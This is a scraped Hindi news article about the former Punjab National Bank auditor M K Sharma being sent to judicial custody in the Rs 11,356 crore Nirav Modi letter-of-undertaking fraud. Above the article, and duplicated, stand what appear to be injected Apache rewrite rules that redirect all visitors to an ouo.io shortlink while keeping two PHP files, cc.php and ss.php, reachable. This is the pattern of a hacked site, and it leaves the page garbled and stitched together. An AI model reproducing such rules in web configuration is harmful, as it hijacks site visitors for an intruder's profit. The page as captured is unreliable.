
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 526
Previousनई दिल्ली। पंजाब नेशनल बैंक के पूर्व मुख्य आंतरिक ऑडिटर एम के शर्मा को स्पेशल सीबीआई कोर्ट ने 27 मार्च तक के लिए न्यायिक हिरासत में भेज दिया है। पुलिस कस्टडी से आज ही वह बरी हुए थे। एक छापे के दौरान जांच एजेंसी को लेटर ऑफ अंडरटेकिंग्स (एलओयू) से संबंधित कुछ दस्तावेज प्राप्त हुए थे जिसके बाद पंजाब नेशनल बैंक की ब्रैडी हाउस शाखा में 2011 से 2015 के दौरान साथ-साथ ऑडिट के लिए जिम्मेदार आंतरिक मुख्य ऑडिटर (सेवानिवृत्त) बिष्णुब्रत मिश्रा को गिरफ्तार किया गया था। मिश्रा पर पीएनबी की शाखा में प्रक्रियाओं और कामकाज के तरीके की ऑडिटिंग की जिम्मेदारी थी. उन्हें उनके बारे में रिपोर्ट भी करना होता था। सीबीआई ने इस मामले में पीएनबी के आंतरिक मुख्य ऑडिटर एम के शर्मा को गिरफ्तार था। वह मुख्य प्रबंधक स्तर के अधिकारी हैं। यह बैंक के किसी ऑडिटर की पहली गिरफ्तारी है। शर्मा, स्केल-चार स्तर के अधिकारी हैं, उन पर बैंक की ब्रैडी हाउस शाखा की प्रणालियों और कामकाज के तौर तरीकों की ऑडिट की जिम्मेदारी थी। इसी शाखा से एलओयू जारी किए गए जिससे नीरव मोदी ने अन्य बैंकों की विदेशी शाखाओं से कर्ज लिया।
गौरतलब है कि हीरा कारोबारी नीरव मोदी और गीतांजलि जेम्स के मालिक मेहुल चौकसी 11,356 करोड़ के पीएनबी बैंक फ्रॉड में आरोपी हैं। इन लोगों पर पीएनबी के अफसरों से मिलीभगत कर फर्जी एलओयू के जरिए विदेशी खाते में कई हजार करोड़ की रकम ट्रांसफर करने का आरोप है।